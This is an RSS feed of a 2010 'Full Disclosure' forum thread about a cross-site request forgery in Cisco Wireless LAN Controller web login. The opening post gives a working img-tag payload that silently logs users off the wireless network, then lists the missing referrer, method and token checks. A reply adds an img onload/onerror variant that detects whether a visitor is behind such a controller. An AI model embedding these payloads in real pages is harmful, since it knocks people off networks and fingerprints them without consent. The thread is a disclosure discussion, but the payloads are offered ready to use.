<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>Simple CSRF for Cisco Wireless LAN Controller</title>
        <description>Here's a simple csrf that will disconnect users using Cisco Wireless LAN Controller http://www.cisco.com/en/US/docs/wireless/controller/5.1/configuration/guide/c51users.html#wpmkr1056080.
For the background: This system is a web login use mostly on unencrypted wireless access point.

&amp;lt;img src=&amp;quot;https://1.1.1.1/logout.html?userStatus=1&amp;amp;err_flag=0&amp;amp;err_msg=&amp;quot;/&amp;gt;

-No referrer validation
-No Method validation (the form is suppose to be POST)
-No token / captcha

The original form : http://slexy.org/view/s20YhD795p</description>
        <link>http://sla.ckers.org/forum/read.php?3,34317,34317#msg-34317</link>
        <lastBuildDate>Tue, 21 May 2013 04:31:50 -0500</lastBuildDate>
        <generator>Phorum 5.2.15a</generator>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,34317,34329#msg-34329</guid>
            <title>Re: Simple CSRF for Cisco Wireless LAN Controller</title>
            <link>http://sla.ckers.org/forum/read.php?3,34317,34329#msg-34329</link>
            <description><![CDATA[That's what I meant; sniffing the particular router/service. Usually routers have images which you can check fast, like spacers.gif or bg.gif, faster than html pages if you're scanning a whole list of routers.]]></description>
            <dc:creator>Skyphire</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Tue, 27 Apr 2010 17:53:16 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,34317,34325#msg-34325</guid>
            <title>Re: Simple CSRF for Cisco Wireless LAN Controller</title>
            <link>http://sla.ckers.org/forum/read.php?3,34317,34325#msg-34325</link>
            <description><![CDATA[Sniffing? the login page is using ssl.<br />
<br />
Image and stylesheet ? If you mean being able to detect that a visitor is using this service, logout.html should do the trick without disconnecting users.<br />
<br />
&lt;img src=&quot;https://1.1.1.1/logout.html&quot; onerror=&quot;alert('nothing special')&quot; onload=&quot;alert('Hi Cisco user!')&quot;/&gt;]]></description>
            <dc:creator>h3xstream</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Tue, 27 Apr 2010 12:45:10 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,34317,34320#msg-34320</guid>
            <title>Re: Simple CSRF for Cisco Wireless LAN Controller</title>
            <link>http://sla.ckers.org/forum/read.php?3,34317,34320#msg-34320</link>
            <description><![CDATA[Nice. Can you sniff that particular lan controller? like an image, or stylesheet?]]></description>
            <dc:creator>Skyphire</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Tue, 27 Apr 2010 08:06:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://sla.ckers.org/forum/read.php?3,34317,34317#msg-34317</guid>
            <title>Simple CSRF for Cisco Wireless LAN Controller</title>
            <link>http://sla.ckers.org/forum/read.php?3,34317,34317#msg-34317</link>
            <description><![CDATA[Here's a simple csrf that will disconnect users using Cisco Wireless LAN Controller http://www.cisco.com/en/US/docs/wireless/controller/5.1/configuration/guide/c51users.html#wpmkr1056080.<br />
For the background: This system is a web login use mostly on unencrypted wireless access point.<br />
<br />
&lt;img src=&quot;https://1.1.1.1/logout.html?userStatus=1&amp;err_flag=0&amp;err_msg=&quot;/&gt;<br />
<br />
-No referrer validation<br />
-No Method validation (the form is suppose to be POST)<br />
-No token / captcha<br />
<br />
The original form : http://slexy.org/view/s20YhD795p]]></description>
            <dc:creator>h3xstream</dc:creator>
            <category>Full Disclosure</category>
            <pubDate>Mon, 26 Apr 2010 17:28:32 -0500</pubDate>
        </item>
    </channel>
</rss>
